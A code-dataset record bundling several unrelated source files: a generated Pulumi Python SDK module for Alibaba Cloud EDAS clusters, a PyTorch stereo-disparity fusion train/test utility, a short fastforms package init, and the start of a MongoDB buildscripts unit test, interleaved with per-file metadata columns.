| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
8a9842bb5ff755a0480190615119f33702eceaac
| 16,521
|
py
|
Python
|
sdk/python/pulumi_alicloud/edas/cluster.py
|
pulumi/pulumi-alicloud
|
9c34d84b4588a7c885c6bec1f03b5016e5a41683
|
[
"ECL-2.0",
"Apache-2.0"
] | 42
|
2019-03-18T06:34:37.000Z
|
2022-03-24T07:08:57.000Z
|
sdk/python/pulumi_alicloud/edas/cluster.py
|
pulumi/pulumi-alicloud
|
9c34d84b4588a7c885c6bec1f03b5016e5a41683
|
[
"ECL-2.0",
"Apache-2.0"
] | 152
|
2019-04-15T21:03:44.000Z
|
2022-03-29T18:00:57.000Z
|
sdk/python/pulumi_alicloud/edas/cluster.py
|
pulumi/pulumi-alicloud
|
9c34d84b4588a7c885c6bec1f03b5016e5a41683
|
[
"ECL-2.0",
"Apache-2.0"
] | 3
|
2020-08-26T17:30:07.000Z
|
2021-07-05T01:37:45.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['ClusterArgs', 'Cluster']
@pulumi.input_type
class ClusterArgs:
def __init__(__self__, *,
cluster_name: pulumi.Input[str],
cluster_type: pulumi.Input[int],
network_mode: pulumi.Input[int],
logical_region_id: Optional[pulumi.Input[str]] = None,
vpc_id: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a Cluster resource.
:param pulumi.Input[str] cluster_name: The name of the cluster that you want to create.
:param pulumi.Input[int] cluster_type: The type of the cluster that you want to create. Valid values only: 2: ECS cluster.
:param pulumi.Input[int] network_mode: The network type of the cluster that you want to create. Valid values: 1: classic network. 2: VPC.
:param pulumi.Input[str] logical_region_id: The ID of the namespace where you want to create the application. You can call the ListUserDefineRegion operation to query the namespace ID.
:param pulumi.Input[str] vpc_id: The ID of the Virtual Private Cloud (VPC) for the cluster.
"""
pulumi.set(__self__, "cluster_name", cluster_name)
pulumi.set(__self__, "cluster_type", cluster_type)
pulumi.set(__self__, "network_mode", network_mode)
if logical_region_id is not None:
pulumi.set(__self__, "logical_region_id", logical_region_id)
if vpc_id is not None:
pulumi.set(__self__, "vpc_id", vpc_id)
@property
@pulumi.getter(name="clusterName")
def cluster_name(self) -> pulumi.Input[str]:
"""
The name of the cluster that you want to create.
"""
return pulumi.get(self, "cluster_name")
@cluster_name.setter
def cluster_name(self, value: pulumi.Input[str]):
pulumi.set(self, "cluster_name", value)
@property
@pulumi.getter(name="clusterType")
def cluster_type(self) -> pulumi.Input[int]:
"""
The type of the cluster that you want to create. Valid values only: 2: ECS cluster.
"""
return pulumi.get(self, "cluster_type")
@cluster_type.setter
def cluster_type(self, value: pulumi.Input[int]):
pulumi.set(self, "cluster_type", value)
@property
@pulumi.getter(name="networkMode")
def network_mode(self) -> pulumi.Input[int]:
"""
The network type of the cluster that you want to create. Valid values: 1: classic network. 2: VPC.
"""
return pulumi.get(self, "network_mode")
@network_mode.setter
def network_mode(self, value: pulumi.Input[int]):
pulumi.set(self, "network_mode", value)
@property
@pulumi.getter(name="logicalRegionId")
def logical_region_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the namespace where you want to create the application. You can call the ListUserDefineRegion operation to query the namespace ID.
"""
return pulumi.get(self, "logical_region_id")
@logical_region_id.setter
def logical_region_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "logical_region_id", value)
@property
@pulumi.getter(name="vpcId")
def vpc_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Virtual Private Cloud (VPC) for the cluster.
"""
return pulumi.get(self, "vpc_id")
@vpc_id.setter
def vpc_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "vpc_id", value)
@pulumi.input_type
class _ClusterState:
def __init__(__self__, *,
cluster_name: Optional[pulumi.Input[str]] = None,
cluster_type: Optional[pulumi.Input[int]] = None,
logical_region_id: Optional[pulumi.Input[str]] = None,
network_mode: Optional[pulumi.Input[int]] = None,
vpc_id: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering Cluster resources.
:param pulumi.Input[str] cluster_name: The name of the cluster that you want to create.
:param pulumi.Input[int] cluster_type: The type of the cluster that you want to create. Valid values only: 2: ECS cluster.
:param pulumi.Input[str] logical_region_id: The ID of the namespace where you want to create the application. You can call the ListUserDefineRegion operation to query the namespace ID.
:param pulumi.Input[int] network_mode: The network type of the cluster that you want to create. Valid values: 1: classic network. 2: VPC.
:param pulumi.Input[str] vpc_id: The ID of the Virtual Private Cloud (VPC) for the cluster.
"""
if cluster_name is not None:
pulumi.set(__self__, "cluster_name", cluster_name)
if cluster_type is not None:
pulumi.set(__self__, "cluster_type", cluster_type)
if logical_region_id is not None:
pulumi.set(__self__, "logical_region_id", logical_region_id)
if network_mode is not None:
pulumi.set(__self__, "network_mode", network_mode)
if vpc_id is not None:
pulumi.set(__self__, "vpc_id", vpc_id)
@property
@pulumi.getter(name="clusterName")
def cluster_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the cluster that you want to create.
"""
return pulumi.get(self, "cluster_name")
@cluster_name.setter
def cluster_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cluster_name", value)
@property
@pulumi.getter(name="clusterType")
def cluster_type(self) -> Optional[pulumi.Input[int]]:
"""
The type of the cluster that you want to create. Valid values only: 2: ECS cluster.
"""
return pulumi.get(self, "cluster_type")
@cluster_type.setter
def cluster_type(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "cluster_type", value)
@property
@pulumi.getter(name="logicalRegionId")
def logical_region_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the namespace where you want to create the application. You can call the ListUserDefineRegion operation to query the namespace ID.
"""
return pulumi.get(self, "logical_region_id")
@logical_region_id.setter
def logical_region_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "logical_region_id", value)
@property
@pulumi.getter(name="networkMode")
def network_mode(self) -> Optional[pulumi.Input[int]]:
"""
The network type of the cluster that you want to create. Valid values: 1: classic network. 2: VPC.
"""
return pulumi.get(self, "network_mode")
@network_mode.setter
def network_mode(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "network_mode", value)
@property
@pulumi.getter(name="vpcId")
def vpc_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Virtual Private Cloud (VPC) for the cluster.
"""
return pulumi.get(self, "vpc_id")
@vpc_id.setter
def vpc_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "vpc_id", value)
class Cluster(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
cluster_name: Optional[pulumi.Input[str]] = None,
cluster_type: Optional[pulumi.Input[int]] = None,
logical_region_id: Optional[pulumi.Input[str]] = None,
network_mode: Optional[pulumi.Input[int]] = None,
vpc_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Provides an EDAS cluster resource.
> **NOTE:** Available in 1.82.0+
## Example Usage
Basic Usage
```python
import pulumi
import pulumi_alicloud as alicloud
default = alicloud.edas.Cluster("default",
cluster_name=var["cluster_name"],
cluster_type=var["cluster_type"],
network_mode=var["network_mode"],
logical_region_id=var["logical_region_id"],
vpc_id=var["vpc_id"])
```
## Import
EDAS cluster can be imported using the id, e.g.
```sh
$ pulumi import alicloud:edas/cluster:Cluster cluster cluster_id
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] cluster_name: The name of the cluster that you want to create.
:param pulumi.Input[int] cluster_type: The type of the cluster that you want to create. Valid values only: 2: ECS cluster.
:param pulumi.Input[str] logical_region_id: The ID of the namespace where you want to create the application. You can call the ListUserDefineRegion operation to query the namespace ID.
:param pulumi.Input[int] network_mode: The network type of the cluster that you want to create. Valid values: 1: classic network. 2: VPC.
:param pulumi.Input[str] vpc_id: The ID of the Virtual Private Cloud (VPC) for the cluster.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ClusterArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides an EDAS cluster resource.
> **NOTE:** Available in 1.82.0+
## Example Usage
Basic Usage
```python
import pulumi
import pulumi_alicloud as alicloud
default = alicloud.edas.Cluster("default",
cluster_name=var["cluster_name"],
cluster_type=var["cluster_type"],
network_mode=var["network_mode"],
logical_region_id=var["logical_region_id"],
vpc_id=var["vpc_id"])
```
## Import
EDAS cluster can be imported using the id, e.g.
```sh
$ pulumi import alicloud:edas/cluster:Cluster cluster cluster_id
```
:param str resource_name: The name of the resource.
:param ClusterArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ClusterArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
cluster_name: Optional[pulumi.Input[str]] = None,
cluster_type: Optional[pulumi.Input[int]] = None,
logical_region_id: Optional[pulumi.Input[str]] = None,
network_mode: Optional[pulumi.Input[int]] = None,
vpc_id: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ClusterArgs.__new__(ClusterArgs)
if cluster_name is None and not opts.urn:
raise TypeError("Missing required property 'cluster_name'")
__props__.__dict__["cluster_name"] = cluster_name
if cluster_type is None and not opts.urn:
raise TypeError("Missing required property 'cluster_type'")
__props__.__dict__["cluster_type"] = cluster_type
__props__.__dict__["logical_region_id"] = logical_region_id
if network_mode is None and not opts.urn:
raise TypeError("Missing required property 'network_mode'")
__props__.__dict__["network_mode"] = network_mode
__props__.__dict__["vpc_id"] = vpc_id
super(Cluster, __self__).__init__(
'alicloud:edas/cluster:Cluster',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
cluster_name: Optional[pulumi.Input[str]] = None,
cluster_type: Optional[pulumi.Input[int]] = None,
logical_region_id: Optional[pulumi.Input[str]] = None,
network_mode: Optional[pulumi.Input[int]] = None,
vpc_id: Optional[pulumi.Input[str]] = None) -> 'Cluster':
"""
Get an existing Cluster resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] cluster_name: The name of the cluster that you want to create.
:param pulumi.Input[int] cluster_type: The type of the cluster that you want to create. Valid values only: 2: ECS cluster.
:param pulumi.Input[str] logical_region_id: The ID of the namespace where you want to create the application. You can call the ListUserDefineRegion operation to query the namespace ID.
:param pulumi.Input[int] network_mode: The network type of the cluster that you want to create. Valid values: 1: classic network. 2: VPC.
:param pulumi.Input[str] vpc_id: The ID of the Virtual Private Cloud (VPC) for the cluster.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ClusterState.__new__(_ClusterState)
__props__.__dict__["cluster_name"] = cluster_name
__props__.__dict__["cluster_type"] = cluster_type
__props__.__dict__["logical_region_id"] = logical_region_id
__props__.__dict__["network_mode"] = network_mode
__props__.__dict__["vpc_id"] = vpc_id
return Cluster(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="clusterName")
def cluster_name(self) -> pulumi.Output[str]:
"""
The name of the cluster that you want to create.
"""
return pulumi.get(self, "cluster_name")
@property
@pulumi.getter(name="clusterType")
def cluster_type(self) -> pulumi.Output[int]:
"""
The type of the cluster that you want to create. Valid values only: 2: ECS cluster.
"""
return pulumi.get(self, "cluster_type")
@property
@pulumi.getter(name="logicalRegionId")
def logical_region_id(self) -> pulumi.Output[Optional[str]]:
"""
The ID of the namespace where you want to create the application. You can call the ListUserDefineRegion operation to query the namespace ID.
"""
return pulumi.get(self, "logical_region_id")
@property
@pulumi.getter(name="networkMode")
def network_mode(self) -> pulumi.Output[int]:
"""
The network type of the cluster that you want to create. Valid values: 1: classic network. 2: VPC.
"""
return pulumi.get(self, "network_mode")
@property
@pulumi.getter(name="vpcId")
def vpc_id(self) -> pulumi.Output[Optional[str]]:
"""
The ID of the Virtual Private Cloud (VPC) for the cluster.
"""
return pulumi.get(self, "vpc_id")
| 42.253197
| 192
| 0.642152
| 2,088
| 16,521
| 4.850096
| 0.081897
| 0.074948
| 0.05668
| 0.041473
| 0.84803
| 0.826997
| 0.819295
| 0.798262
| 0.772094
| 0.766268
| 0
| 0.002452
| 0.259427
| 16,521
| 390
| 193
| 42.361538
| 0.825255
| 0.352461
| 0
| 0.663415
| 1
| 0
| 0.105106
| 0.002985
| 0
| 0
| 0
| 0
| 0
| 1
| 0.156098
| false
| 0.004878
| 0.02439
| 0
| 0.273171
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
76e7d6aed3a82a3122e16adcdf3dce7e3d265697
| 12,234
|
py
|
Python
|
fuse_utils.py
|
weihaosky/MFuseNet
|
e3a88dfc6089d70edbddb6be2ba52dc7cc89e679
|
[
"MIT"
] | 11
|
2020-04-23T04:18:15.000Z
|
2021-11-15T10:52:47.000Z
|
fuse_utils.py
|
zhangtianjia/MFuseNet
|
e3a88dfc6089d70edbddb6be2ba52dc7cc89e679
|
[
"MIT"
] | 2
|
2020-08-26T10:47:04.000Z
|
2021-03-31T01:56:51.000Z
|
fuse_utils.py
|
zhangtianjia/MFuseNet
|
e3a88dfc6089d70edbddb6be2ba52dc7cc89e679
|
[
"MIT"
] | 2
|
2020-12-25T08:11:22.000Z
|
2021-08-06T04:27:15.000Z
|
import torch, torchvision
import torch.nn.functional as F
from PIL import Image
import numpy as np
import os, cv2
# Disp_type = '' # the ground-truth disparity format is disparity*1
Disp_type = 'x4' # the ground-truth disparity format is disparity*4
def train(model, optimizer, costs_input, img, disp, args, Test=False):
if not Test:
model.train()
optimizer.zero_grad()
else:
model.eval()
costs = []
if args.cuda:
img, disp = img.cuda(), disp.cuda()
for cost in costs_input:
costs.append(cost.cuda())
output = model(costs)
output = output.squeeze(1)
mask = (disp != 0)
loss = F.smooth_l1_loss(output[mask], disp[mask], reduction='mean')
if not Test:
loss.backward()
optimizer.step()
cv2.imwrite(args.output_path + 'train/img.png',
255*img[0].permute([1,2,0]).detach().cpu().numpy())
cv2.imwrite(args.output_path + 'train/outdisp.png',
output[0].detach().cpu().numpy())
return loss.data.item()
def test(model, args, epoch):
test_record = []
for scene in os.listdir(args.testpath):
left_path = args.testpath + scene + '/' + 'left.bin'
right_path = args.testpath + scene + '/' + 'right.bin'
img_path = args.testpath + scene + '/' + 'view1.png'
disp_path = args.testpath + scene + '/' + 'disp1' + Disp_type + '.png'
d = args.maxdisp
img = Image.open(img_path)
w, h = img.size
img = np.array(img).transpose(2, 0, 1)
disp = Image.open(disp_path)
disp = np.expand_dims(np.array(disp), 0)
left_mem = np.memmap(left_path, dtype=np.float32, shape=(1, d, h, w))
right_mem = np.memmap(right_path, dtype=np.float32, shape=(1, d, h, w))
costL = np.squeeze(np.array(left_mem))
costR = np.squeeze(np.array(right_mem))
costL[np.isnan(costL)]=20
costR[np.isnan(costR)]=20
costL = torch.from_numpy(costL).unsqueeze(0).cuda()
costR = torch.from_numpy(costR).unsqueeze(0).cuda()
# pad to 16
pad_h = (h / 16 + (1 if h % 16 != 0 else 0)) * 16 - h
pad_w = (w / 16 + (1 if h % 16 != 0 else 0)) * 16 - w
costL = F.pad(costL, (0, pad_w, 0, pad_h))
costR = F.pad(costR, (0, pad_w, 0, pad_h))
# for large image, process piece by piece
SIZE = 512
Edge = 8
wseg = w // SIZE + 1 if( w % SIZE != 0) else 0
hseg = h // SIZE + 1 if( h % SIZE != 0) else 0
outdisp = torch.ones(1, h+pad_h, w+pad_w).float().cuda()
with torch.no_grad():
for i in range(hseg):
for j in range(wseg):
y1 = max(i*SIZE-Edge, 0)
y2 = (i+1)*SIZE + Edge
x1 = max(j*SIZE-Edge, 0)
x2 = (j+1)*SIZE + Edge
outdisp[:, i*SIZE:(i+1)*SIZE, j*SIZE:(j+1)*SIZE] = \
model([costL[:, :, y1:y2, x1:x2], costR[:, :, y1:y2, x1:x2]]) \
[:,min(i,1)*Edge:min(i,1)*Edge+SIZE,min(j,1)*Edge:min(j,1)*Edge+SIZE]
outdisp = outdisp[:, :h, :w]
dispgt = torch.from_numpy(disp).float().cuda()
if(Disp_type == 'x4'): # the ground-truth is disparity*4
dispgt /= 4.0
mask = (dispgt != 0)
diff = torch.abs(outdisp[mask] - dispgt[mask])
avgerr = torch.mean(diff)
rms = torch.sqrt( (diff**2).mean() )
bad05 = len(diff[diff>0.5])/float(len(diff))
bad1 = len(diff[diff>1])/float(len(diff))
bad2 = len(diff[diff>2])/float(len(diff))
test_record.append([avgerr, rms, bad05, bad1, bad2])
cv2.imwrite(args.output_path + 'test/' + scene + "_outdisp.png",
outdisp.cpu().numpy().squeeze())
test_res = np.array(test_record).mean(0)
print('==== epoch %d test avgerr = %.3f, rms = %.3f, bad05 = %.3f, bad1 = %.3f, bad2 = %.3f ==='
% (epoch, test_res[0], test_res[1], test_res[2], test_res[3], test_res[4]) )
return test_res
def eval(model, args, epoch):
eval_record = []
for scene in os.listdir(args.evalpath):
left_path = args.evalpath + scene + '/' + 'left.bin'
right_path = args.evalpath + scene + '/' + 'right.bin'
img_path = args.evalpath + scene + '/' + 'view1.png'
d = args.maxdisp
img = Image.open(img_path)
w, h = img.size
left_mem = np.memmap(left_path, dtype=np.float32, shape=(1, d, h, w))
right_mem = np.memmap(right_path, dtype=np.float32, shape=(1, d, h, w))
costL = np.squeeze(np.array(left_mem))
costR = np.squeeze(np.array(right_mem))
costL[np.isnan(costL)]=20
costR[np.isnan(costR)]=20
costL = torch.from_numpy(costL).unsqueeze(0).cuda()
costR = torch.from_numpy(costR).unsqueeze(0).cuda()
# pad to 16
pad_h = (h / 16 + (1 if h % 16 != 0 else 0)) * 16 - h
pad_w = (w / 16 + (1 if h % 16 != 0 else 0)) * 16 - w
costL = F.pad(costL, (0, pad_w, 0, pad_h))
costR = F.pad(costR, (0, pad_w, 0, pad_h))
# for large image
SIZE = 512
wseg = w // SIZE + 1 if( w % SIZE != 0) else 0
hseg = w // SIZE + 1 if( h % SIZE != 0) else 0
outdisp = torch.ones(1, h+pad_h, w+pad_w).float().cuda()
with torch.no_grad():
for i in range(hseg):
for j in range(wseg):
outdisp[:, i*SIZE:(i+1)*SIZE, j*SIZE:(j+1)*SIZE] = \
model([costL[:, :, i*SIZE:(i+1)*SIZE, j*SIZE:(j+1)*SIZE],
costR[:, :, i*SIZE:(i+1)*SIZE, j*SIZE:(j+1)*SIZE]])
outdisp = outdisp[:, :h, :w]
cv2.imwrite(args.output_path + 'eval/' + scene + "_outdisp.png",
outdisp.cpu().numpy().squeeze())
return eval_record
def test4(model, args, epoch):
# ====================== train data ========================
test_record = []
for scene in os.listdir(args.trainpath):
left_path = args.trainpath + scene + '/left.bin'
right_path = args.trainpath + scene + '/right.bin'
bottom_path = args.trainpath + scene + '/bottom.bin'
top_path = args.trainpath + scene + '/top.bin'
img_path = args.trainpath + scene + '/view1.png'
disp_path = args.trainpath + scene + '/disp1' + Disp_type + '.png'
d = args.maxdisp
img = Image.open(img_path)
w, h = img.size
img = np.array(img).transpose(2, 0, 1)
disp = Image.open(disp_path)
disp = np.expand_dims(np.array(disp), 0)
left_mem = np.memmap(left_path, dtype=np.float32, shape=(1, d, h, w))
right_mem = np.memmap(right_path, dtype=np.float32, shape=(1, d, h, w))
costL = np.squeeze(np.array(left_mem))
costR = np.squeeze(np.array(right_mem))
costL[np.isnan(costL)]=20
costR[np.isnan(costR)]=20
costL = torch.from_numpy(costL).unsqueeze(0).cuda()
costR = torch.from_numpy(costR).unsqueeze(0).cuda()
bottom = np.memmap(bottom_path, dtype=np.float32, shape=(1, d, w, h))
top = np.memmap(top_path, dtype=np.float32, shape=(1, d, w, h))
bottom=np.rot90(np.array(bottom), k=-1, axes=(2,3)).copy()
top=np.rot90(np.array(top), k=-1, axes=(2,3)).copy()
bottom[np.isnan(bottom)]=20
top[np.isnan(top)]=20
bottom = np.squeeze(bottom)
top = np.squeeze(top)
costB = torch.from_numpy(bottom).unsqueeze(0).cuda()
costT = torch.from_numpy(top).unsqueeze(0).cuda()
# for large image
SIZE = 512
wseg = w // SIZE + 1 if( w % SIZE != 0) else 0
hseg = w // SIZE + 1 if( h % SIZE != 0) else 0
outdisp = torch.ones(1, h, w).float().cuda()
with torch.no_grad():
for i in range(hseg):
for j in range(wseg):
outdisp[:, i*SIZE:(i+1)*SIZE, j*SIZE:(j+1)*SIZE] = \
model([costL[:, :, i*SIZE:(i+1)*SIZE, j*SIZE:(j+1)*SIZE],
costR[:, :, i*SIZE:(i+1)*SIZE, j*SIZE:(j+1)*SIZE],
costB[:, :, i*SIZE:(i+1)*SIZE, j*SIZE:(j+1)*SIZE],
costT[:, :, i*SIZE:(i+1)*SIZE, j*SIZE:(j+1)*SIZE]])
outdisp = outdisp.squeeze(1)
dispgt = torch.from_numpy(disp).float().cuda()
if(Disp_type == 'x4'): # the ground-truth is disparity*4
dispgt /= 4.0
mask = (dispgt != 0)
diff = torch.abs(outdisp[mask] - dispgt[mask])
avgerr = torch.mean(diff)
rms = torch.sqrt( (diff**2).mean())
bad05 = len(diff[diff>0.5])/float(len(diff))
bad1 = len(diff[diff>1])/float(len(diff))
bad2 = len(diff[diff>2])/float(len(diff))
test_record.append([avgerr, rms, bad05, bad1, bad2])
cv2.imwrite(args.output_path + 'test/' + scene + "_outdisp.png",
outdisp.cpu().numpy().squeeze())
test_res = np.array(test_record).mean(0)
print('======= epoch %d avgerr = %.3f, rms = %.3f, bad05 = %.3f, bad1 = %.3f, bad2 = %.3f ======='
% (epoch, test_res[0], test_res[1], test_res[2], test_res[3], test_res[4]))
return test_res
def test1(model, args, epoch):
test_record = []
for scene in os.listdir(args.testpath):
right_path = args.testpath + scene + '/' + 'right.bin'
img_path = args.testpath + scene + '/' + 'view1.png'
disp_path = args.testpath + scene + '/' + 'disp1' + Disp_type + '.png'
d = args.maxdisp
img = Image.open(img_path)
w, h = img.size
img = np.array(img).transpose(2, 0, 1)
disp = Image.open(disp_path)
disp = np.expand_dims(np.array(disp), 0)
right_mem = np.memmap(right_path, dtype=np.float32, shape=(1, d, h, w))
costR = np.squeeze(np.array(right_mem))
costR[np.isnan(costR)]=20
costR = torch.from_numpy(costR).unsqueeze(0).cuda()
# pad to 16
pad_h = (h / 16 + (1 if h % 16 != 0 else 0)) * 16 - h
pad_w = (w / 16 + (1 if h % 16 != 0 else 0)) * 16 - w
costR = F.pad(costR, (0, pad_w, 0, pad_h))
# for large image
SIZE = 512
Edge = 8
wseg = w // SIZE + 1 if( w % SIZE != 0) else 0
hseg = h // SIZE + 1 if( h % SIZE != 0) else 0
outdisp = torch.ones(1, h+pad_h, w+pad_w).float().cuda()
with torch.no_grad():
for i in range(hseg):
for j in range(wseg):
y1 = max(i*SIZE-Edge, 0)
y2 = (i+1)*SIZE + Edge
x1 = max(j*SIZE-Edge, 0)
x2 = (j+1)*SIZE + Edge
outdisp[:, i*SIZE:(i+1)*SIZE, j*SIZE:(j+1)*SIZE] = \
model([costR[:, :, y1:y2, x1:x2]]) \
[:,min(i,1)*Edge:min(i,1)*Edge+SIZE,min(j,1)*Edge:min(j,1)*Edge+SIZE]
outdisp = outdisp[:, :h, :w]
dispgt = torch.from_numpy(disp).float().cuda()
if(Disp_type == 'x4'): # the ground-truth is disparity*4
dispgt /= 4.0
mask = (dispgt != 0)
diff = torch.abs(outdisp[mask] - dispgt[mask])
avgerr = torch.mean(diff)
rms = torch.sqrt( (diff**2).mean() )
bad05 = len(diff[diff>0.5])/float(len(diff))
bad1 = len(diff[diff>1])/float(len(diff))
bad2 = len(diff[diff>2])/float(len(diff))
test_record.append([avgerr, rms, bad05, bad1, bad2])
cv2.imwrite(args.output_path + 'test/' + scene + "_outdisp.png",
outdisp.cpu().numpy().squeeze())
test_res = np.array(test_record).mean(0)
print('==== epoch %d test avgerr = %.3f, rms = %.3f, bad05 = %.3f, bad1 = %.3f, bad2 = %.3f ==='
% (epoch, test_res[0], test_res[1], test_res[2], test_res[3], test_res[4]) )
return test_res
| 41.89726
| 102
| 0.5094
| 1,720
| 12,234
| 3.540698
| 0.087791
| 0.019704
| 0.013793
| 0.011494
| 0.824138
| 0.816749
| 0.783415
| 0.75468
| 0.749261
| 0.740394
| 0
| 0.044909
| 0.319274
| 12,234
| 292
| 103
| 41.89726
| 0.686359
| 0.031797
| 0
| 0.725738
| 0
| 0.012658
| 0.044967
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021097
| false
| 0
| 0.021097
| 0
| 0.063291
| 0.012658
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
76e9d48b4f1d3eb73d3ff45bbbd330d689102b30
| 203
|
py
|
Python
|
fastforms/fields/__init__.py
|
devkral/fastforms
|
bac8e26f7579f169c8896adf56364267719f92c5
|
[
"BSD-3-Clause"
] | null | null | null |
fastforms/fields/__init__.py
|
devkral/fastforms
|
bac8e26f7579f169c8896adf56364267719f92c5
|
[
"BSD-3-Clause"
] | null | null | null |
fastforms/fields/__init__.py
|
devkral/fastforms
|
bac8e26f7579f169c8896adf56364267719f92c5
|
[
"BSD-3-Clause"
] | null | null | null |
from fastforms.fields.core import *
from fastforms.fields.simple import *
# Compatibility imports
from fastforms.fields.core import Label, Field
from fastforms.utils import unset_value as _unset_value
| 25.375
| 55
| 0.827586
| 28
| 203
| 5.892857
| 0.5
| 0.315152
| 0.345455
| 0.278788
| 0.351515
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.118227
| 203
| 7
| 56
| 29
| 0.921788
| 0.103448
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
0a2c570897be23f99dde04220b01b3d053278f1d
| 27,915
|
py
|
Python
|
buildscripts/tests/test_test_failures.py
|
MartinNeupauer/mongo
|
6cc2dfe7edd312b8596355edef454e15988e350e
|
[
"Apache-2.0"
] | 1
|
2019-10-10T06:41:01.000Z
|
2019-10-10T06:41:01.000Z
|
buildscripts/tests/test_test_failures.py
|
visemet/mongo
|
232c772546f26bcb5a5556d859e56002a4135f0b
|
[
"Apache-2.0"
] | 2
|
2021-03-26T00:01:11.000Z
|
2021-03-26T00:02:19.000Z
|
buildscripts/tests/test_test_failures.py
|
visemet/mongo
|
232c772546f26bcb5a5556d859e56002a4135f0b
|
[
"Apache-2.0"
] | 5
|
2020-12-16T13:31:55.000Z
|
2021-01-17T07:39:30.000Z
|
"""
Tests for buildscripts/test_failures.py.
"""
from __future__ import absolute_import
import datetime
import unittest
from buildscripts import test_failures
class TestReportEntry(unittest.TestCase):
"""
Tests for the test_failures.ReportEntry class.
"""
ENTRY = test_failures.ReportEntry(test="jstests/core/all.js",
task="jsCore_WT",
variant="linux-64",
distro="rhel62",
start_date=datetime.date(2017, 6, 3),
end_date=datetime.date(2017, 6, 3),
num_pass=0,
num_fail=0)
def test_fail_rate(self):
"""
Tests for the test_failures.ReportEntry.fail_rate property.
"""
entry = self.ENTRY._replace(num_pass=0, num_fail=1)
self.assertEqual(1, entry.fail_rate)
entry = self.ENTRY._replace(num_pass=9, num_fail=1)
self.assertAlmostEqual(0.1, entry.fail_rate)
# Verify that we don't attempt to divide by zero.
entry = self.ENTRY._replace(num_pass=0, num_fail=0)
self.assertEqual(0, entry.fail_rate)
def test_week_start_date_with_sunday(self):
"""
Tests for test_failures.ReportEntry.week_start_date() with the beginning of the week
specified as different forms of the string "Sunday".
"""
entry = self.ENTRY._replace(start_date=datetime.date(2017, 6, 3))
self.assertEqual(datetime.date(2017, 5, 28), entry.week_start_date("sunday"))
self.assertEqual(datetime.date(2017, 5, 28), entry.week_start_date("Sunday"))
self.assertEqual(datetime.date(2017, 5, 28), entry.week_start_date("SUNDAY"))
entry = self.ENTRY._replace(start_date=datetime.date(2017, 6, 4))
